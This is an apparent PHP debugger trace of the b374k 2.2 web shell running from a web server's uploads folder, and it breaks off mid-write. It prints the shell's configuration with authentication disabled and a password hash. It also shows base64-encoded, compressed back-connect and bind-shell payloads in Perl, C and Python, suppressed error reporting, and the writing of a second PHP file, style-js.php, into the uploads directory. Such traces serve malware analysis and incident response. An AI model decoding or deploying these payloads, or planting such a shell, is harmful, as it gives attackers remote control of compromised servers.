4 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code(25) : eval()'d code 2 $s_title = 'b374k 2.2'
4 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code(25) : eval()'d code 2 $s_auth = FALSE
5 22 0 0.013393 999712 trim 0 /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code(25) : eval()'d code 2 1 '0de664ecd2be02cdd54234a0d1229b43'
5 22 1 0.013409 999744
5 22 R '0de664ecd2be02cdd54234a0d1229b43'
4 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code(25) : eval()'d code 2 $xback_pl = 'dZFfT4MwFMXf+RQVmSvJEuYzqcmCaJZlYwH0xT+EwVUbR0vaLmZx87PblqnEbG/33HPOL7dwfhZspAhWlAUtiLWzkYAyXr2DCh2PS0SQ95zoUW6lgoa4Ninf3NChL9gGvlATfOgl9T/Rb2wQJfNsGUcDFMzccO94Y+JVTa1BqhSvoIg3SW/vHy6f9Kbl4kePjaZlXQtCGaiiVJzhQ8VHux2qKWAXhODikbm+Kduw1BeboaA6bngj1GFOlARXnGimHVZbVjaAh6pqh9qV9vU4S6JZnI/Q8qaYLsxgFkWWp/Fkrum2eZReccag+gN0Jx6N8hYYzvLr6WKE3KuLrtE3krv8hBOn6T+n+/T48AvMIWsuocP3lWb2pQZp+Q0='
4 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code(25) : eval()'d code 2 $xbind_pl = 'bZFvS8MwEMbf51PcYre1UKjiy1pxdFXHtnY0VRD/lNneNFiT0maozPnZTYpTEd+F537P5e65vZ63bhvvnguvxqYilmwhAOsu8YnFzqPZLKBdsX2kPuEru6t/wLP3okXubGBH9cNkzhZR2AdvSv2tZsE+GaVnl3AEBw5sAF+5sg8cH7bEmk1YFsX5IkmzwDLQ9f6tT9YtApPFEyr9ed1IJQtZBQ+ouvf9m1g+oz1URT10fNJ2oM3cweI0n8RR5g5YEk5zlqXRaO5++x14f4eSo02xaWRzI6gxozJ+WZsGLJnlxqpbsCRPowsWjcbj1NWzEr16qREDL8uyybmwfw/vTmKD5qP4yvn3o4q3CoXucLgrA9VBvjzyCnUYZEOWRYF6jDCJY5c5XcY926p5Gaxk8+QYpHOFSyGkAiNSMOH2SlxxgSUYWBtljQJYNp7ELj0amH70R0wuMpce/1WjNP2l4isWX+f8b5Wikvo+hjUoV7Dvky3ZfgI='
4 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code(25) : eval()'d code 2 $xback_c = 'XVFNawIxEL0L/odhhZJocF2v2oKIBSmtontrZVmTbDd0TSSJxQ/8702y1loPSWbmvXkzvLSEpNWOcRgay4Tqlk/NRuuvdjCxUfSL2ztAcivciYUMgJAWNrmQyAe5/qQEaJlraLv4+32FTzWlYINmw1i9oxa8bM6YzoQEI6QDWM43SqKE9LCnOWl3siLfiOoAjzB6zqZvk/QG2iptHVBaJQ3KrRIojEtW+FbAD+ma8Diy3zrENbe/8tT1kWv1WyBuwYrLK95JOreVi3rBnFhtDbpsRmA5G79ky3QxGb0SmM7ni1k6y9LxHIPrEAUgRJWUnFpUMALozgloY3hwGxPnx5Gr4h7HGA97+LTlWiuNovB8yAgP+F5Y5Ew7Ow93234QDx5es+Rf1vcZ33NaoSheCxmbMiKRv1D9azh000oZ7hp8fP4B'
4 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code(25) : eval()'d code 2 $xbind_c = 'dVJhS+QwEP0u+B9yFW6Ttex2BT/1erCcCiK3B+oXUSkxSe1gNylJVl0W//tNmha0KrRJ5r2XzMtMDkCLZiMV+eW8BDOrf+/vHbzDLOjHMbh1c79tlfsCd0Y8KT8itPKA/xz0iFDW6pgStCdrDppy+yhSHJ5ZBEOc7++JmlsynQYi30UmpKpkSrR6qSRK0OtGRJhLaUvQxKq18Qo5qGhl7BNlpChIxggeEbmZA11WfA3NlhRkeVaer06v8w9sa6xHrvZGO8q9geDx+XZxz9hHYcg6c93U6xt6vlqenFyWy9VNEEfLSMYy0T5fevXvz0V5dX15uvybZiz6/RHFjLRYJWNp0k13Ogn8A2hJ+wLQ0cXJlP2MrlKSvS668xpwXulhx3GAXmpoFF0wLEVXwYILoVo/aLJoRG7aI9rxn+LFKD4KsXpVoqHJHA3OXZ2kSRho7B7rThCNcSpuCeHb8IWWirrlzvXyB+7wBnGttFdWSda3HnAj9pNCkeUQHmmDlxs0'
4 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code(25) : eval()'d code 2 $xmulti_py = 'lVNda9swFH22wf9B9R4qk9T56PYS0CCMlJYlzWgyGHQjuLZSizqSkZS2+ffVvbKb0GSM5SHWx9E5514dfTrrbY3uPQjZ4/KZ1DtbKhmFYlMrbYkyXWJ28KfyJ267xIoNj8LZ+NdqOrllg/7wcxQurifTKYuR4yEzJbnI4yhc3swmq/nPJbvs96Pwx/xuyWK3fD1f+EHB18SUvKpovimSURQGplyprWXKpLWquaTI24lJ3AFEqnlWVEJyQxMHlg0aqIK10kQQIYnO5COnlTvstxMkbsEd5r/34o9b1dxutSTNnjeU5VYoSXMlJZ58KUXFyVJvOfJYvcNvUDtHDFDOVf5Mm36Ar4C/5ry2DUwLaWnMtVb6t4xxv9UFUsRXxpMHwInlBKcKAsnkYuALQnCHwZovxv3EmgADi0dFHjeoj2Igt8eZ4iPuKnNuWmDrC6nBAjj42m8XA2j//gbbVeyK4bKg0P8ozPTjM3MZSmHgguWpYJIwNgQyzAYs3A9cKWjw'
4 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code(25) : eval()'d code 2 $wmulti_c = '7Vh3WFPZtj8pkEASEiQISDsoCigdRkCDJAICChIBFQtCGhhNMzmhSAsTUEOMxq4ICg6jjgURlSpFcChWHBsKKDrohRvaIBcYUc8NI3e+Ke/73n/vj/fe+r619lm/Vfbae/+x9zphG9UACgAAtJZhGAAqga9EBf57kmnZwLraALiud9+mEhF63yZqK1cCisTCBDGDD7IYAoEQApkcUCwVgFwBGBAeCfKFbI4zgaBvO5ODHggAoQgUYE+zCPtP3h6AiMIhkN4AqFVIWhYBgHrfzISFM9VN48ivdSNm6v+NSmdivpq1BM7opN9x0h8Xoc1HQQD/47SWHu3624foDwUh/7a/PVo/t/8s47f1z/q7H/Wrn/vviyuc8SH/za/Bw9nVa3pyG4IeUp9qnPRJj3lrQx4bAMQGWg/tqdgigPDWOBheq3gnH8AWjTCoQBvcE68m9g5W1BMiSZ4taFu64aw+BGBINqgZTKpBY/R4aIO9qsCRFu2cigD+EH/KllQEutq2'
4 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code(25) : eval()'d code 2 $favicon = 'AQYD+fyJUE5HDQoaCgAAAA1JSERSAAAAEAAAABAIBgAAAB/z/2EAAAAEZ0FNQQAAr8g3BYrpAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAphJREFUOMudk8lPU1EUxvkbXAMdXlug2Kp0eu8ViiUIC2wZJJYqkwUqFiqUMjqgAQppUnAIiBKmFoq0thYKBI0GBGMw0ejGxIVLdyYmYDQ0xPD5HokopmXh4kvuyb3nd853ck8cgLhYylymkblIadlzxmNVUXpAuf3vmwOB9pma+DvWhElkhFRhy4Cer/YpaugZ+bdDASfZiktU8+84PaiKqP3Kr+YbOd6CXnqbHpPtltjUzpgAzQK5mTFPRvZaDpBb9KwClFcOyi1H53oT1j+H0O6qgK4mrSUqgPGpTX+khMZHbuYFTiH4YRxPPk5j4KUDklvJqFjOh//1ME70H8VxZyqkDjFTdZ7cYnzue2d87mZ6Kcy+u42epyZcDZegNVwJ'
4 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code(25) : eval()'d code 2 $style = 'tVbJbtswEL33KwgEBVrAMrS4biKfggL9gqLXghIpiwhFChQd2xHy7xUpyhwtdlIgFS+2PJzlvTczziQ5tyjD+dNeyYMg6V1onx0qpNBBw15oGkX1yX0vcMX4Of2FS1nh1W+qCBZ49agY5juUSy5VelcUxQ69orsKMzF2Hdlnh2pMCBP7NK5P6N74Dir5EmRSEaoChQk7NCmKQvPL4ssjI7pMozD8bAOVFHc2Laqw2jORhj5A91HTkw4wZ3uRclpocAFpcuWONymjFgAR2+jA0N8OjjR7YjrQCoumkKpKkZIaa/oliJJ18p3Q/VdX520TGBvhFoDqcPXvNj/uk8efrkRCc6mwZlKkQgpqLNfGEROFbAcYDQJpxyZqJGcEXTy4OrawPENO2J3IvnXedMbbCfzD+wbpjoOSsn2p03hjLj1TpVmOucO/YoTwPrM9PuMVWj8b2ibVWLiPvZtMcmLtreGHYcyp1h0aTY1zV2kvWCoOy4IdeEYGlK405K6szZWK'
4 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code(25) : eval()'d code 2 $sortable_js = '3VrvctvGEf/OpzixqkiGJCg6SWciilIsW5lo6jidWtN8oGjNAThSsECAAY6i1VgznT5GP7Zf+xTJm/RJurv3BwcQpKU07WQ6Y0vA3f753e7e7t5BdzxjubzIL87ZmA0++TIIrtNk78tPBjMe52LUyNNMSu7HAqZ/aLAoieQRm62SQEZp0u7Q2Iy1eTZfLUQicy/gcSyEF6aJ6LBMyFWWjBqsdh5EymwFSkjEtYwWIuuwIBY8u0ikyO54bEZHTBHthWlAgrwgE1yK81jgG/vwgRVTcyH1eH52f8nnr/nCxWKX5L18fnl+/Uda+dv2VXgVnnYmV4Mrrz+tvNFr55R+7g9AxizNznlw096ps90iNa1Or7AYjVizKRhBzPMcGbwclg5SB1c+gsTJK3/QYXtj1h92HOALfiveaAotEkA90I9eA2zlEhzt1r4F+Y3gYavjxSKZyxs2HrND4oNxMFe9FyzXiOg8vlyKJHxxE8Wh1pWl63xyOCUCGoiSXGTyTIA9'
5 23 0 0.013647 999712 base64_decode 0 /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code(25) : eval()'d code 336 1 'tVbJbtswEL33KwgEBVrAMrS4biKfggL9gqLXghIpiwhFChQd2xHy7xUpyhwtdlIgFS+2PJzlvTczziQ5tyjD+dNeyYMg6V1onx0qpNBBw15oGkX1yX0vcMX4Of2FS1nh1W+qCBZ49agY5juUSy5VelcUxQ69orsKMzF2Hdlnh2pMCBP7NK5P6N74Dir5EmRSEaoChQk7NCmKQvPL4ssjI7pMozD8bAOVFHc2Laqw2jORhj5A91HTkw4wZ3uRclpocAFpcuWONymjFgAR2+jA0N8OjjR7YjrQCoumkKpKkZIaa/oliJJ18p3Q/VdX520TGBvhFoDqcPXvNj/uk8efrkRCc6mwZlKkQgpqLNfGEROFbAcYDQJpxyZqJGcEXTy4OrawPENO2J3IvnXedMbbCfzD+wbpjoOSsn2p03hjLj1TpVmOucO/YoTwPrM9PuMVWj8b2ibVWLiPvZtMcmLtreGHYcyp1h0aTY1zV2kvWCoOy4IdeEYGlK405K6szZWK'
5 23 1 0.013676 1001024
5 23 R 'Vn0\020+\b\004\005Z2n"\002ׂ\022)\bE\n\024\035\021\025)\034-vR \025/<73$9(^Ƀ ]h\035*A^h\032E}/p9KYo\b\026x\030;K.UzW\024\016\n31v\035gjL\b\0234O\016*\022dR\021\002\t;4)B##L0l\003\024w6-3>@Qӓ\0160g{rZhp\001ir7)\026\000\021\0164{b:\nJ\032k%uWWm\023\030\033\026p6?ǟDBsfRB\nj,\021\023l\a\030\r\002i&j$g\004]<:=>\025Z?\033&XLrba̩\035\032M'
5 24 0 0.013737 1000992 gzinflate 0 /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code(25) : eval()'d code 336 1 'Vn0\020+\b\004\005Z2n"\002ׂ\022)\bE\n\024\035\021\025)\034-vR \025/<73$9(^Ƀ ]h\035*A^h\032E}/p9KYo\b\026x\030;K.UzW\024\016\n31v\035gjL\b\0234O\016*\022dR\021\002\t;4)B##L0l\003\024w6-3>@Qӓ\0160g{rZhp\001ir7)\026\000\021\0164{b:\nJ\032k%uWWm\023\030\033\026p6?ǟDBsfRB\nj,\021\023l\a\030\r\002i&j$g\004]<:=>\025Z?\033&XLrba̩\035\032M'
5 24 1 0.013811 1004096
5 24 R 'body{ background:#000000; font-size:11px; font-family:Tahoma,Verdana,Arial; color:#fff; } #main{ background:#111111; padding:2px 8px; -moz-border-radius: 10px; border-radius: 10px; width:100%; } #header{ margin:0; padding:0; text-align:left; } #header td{ margin:0; padding:0; } #header h1{ font-size:20px; padding:0; margin:0; -webkit-transform: rotate(-13.37deg); -moz-transform: rotate(-13.37deg); } #header h1 a{ color:#ffffff; } a{ color:#4C83AF; text-decoration:none; } .headinfo{ border-left:1px solid #4C'
5 25 0 0.013854 999824 time 0 /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code(25) : eval()'d code 395 0
5 25 1 0.013869 999824
5 25 R 1676239776
5 26 0 0.013882 999824 date 0 /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code(25) : eval()'d code 395 2 'Y' 1676239776
5 26 1 0.013944 1002216
5 26 R '2023'
4 19 1 0.013966 1001888
4 27 0 0.013999 735416 session_start 0 /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 284 0
4 27 1 0.014018 735416
4 27 R FALSE
4 28 0 0.014032 735416 session_start 0 /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 285 0
4 28 1 0.014048 735416
4 28 R FALSE
4 29 0 0.014061 735416 error_reporting 0 /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 286 1 0
4 29 1 0.014075 735456
4 29 R 0
4 30 0 0.014087 735416 error_reporting 0 /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 287 1 0
4 30 1 0.014102 735456
4 30 R 0
3 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 288 $a = ' '.', 1 => '..', 2 => 'uploads']
3 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 308 $dir = [0 => '.', 1 => '..', 2 => 'uploads']
3 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 309 $d1 = '/var/www/html/.'
3 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 310 $d2 = '/var/www/html/..'
4 32 0 0.014251 735976 array_search 0 /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 311 2 '.' [0 => '.', 1 => '..', 2 => 'uploads']
4 32 1 0.014270 736048
4 32 R 0
3 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 311 $key = 0
4 33 0 0.014295 735944 array_search 0 /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 314 2 '..' [1 => '..', 2 => 'uploads']
4 33 1 0.014311 736016
4 33 R 1
3 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 314 $key = 1
4 34 0 0.014335 735912 array_search 0 /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 317 2 '/var/www/html/.' [2 => 'uploads']
4 34 1 0.014351 735984
4 34 R FALSE
3 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 317 $key = FALSE
4 35 0 0.014375 735912 array_search 0 /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 320 2 '/var/www/html/..' [2 => 'uploads']
4 35 1 0.014390 735984
4 35 R FALSE
3 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 320 $key = FALSE
4 36 0 0.014414 735936 array_push 0 /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 323 2 [2 => 'uploads'] '/var/www/html'
4 36 1 0.014430 736000
4 36 R 2
3 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 325 $p = '/var/www/html/uploads'
4 37 0 0.014455 735984 is_dir 0 /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 326 1 '/var/www/html/uploads'
4 37 1 0.014473 736048
4 37 R TRUE
3 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 327 $file = '/var/www/html/uploads/style-js.php'
4 38 0 0.014499 736072 touch 0 /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 328 1 '/var/www/html/uploads/style-js.php'
4 38 1 0.014542 736112
4 38 R TRUE
4 39 0 0.014557 736072 fopen 0 /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 329 2 '/var/www/html/uploads/style-js.php' 'w'
4 39 1 0.014589 736736
4 39 R resource(5) of type (stream)
3 A /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 329 $folder = resource(5) of type (stream)
4 40 0 0.014620 736664 fwrite 0 /var/www/html/uploads/bk.php.suspected(5) : eval()'d code(1) : eval()'d code 330 2 resource(5) of type (stream) ' ![\\"\\"](\\"?d=".$pwd."&img=".$filn."\\")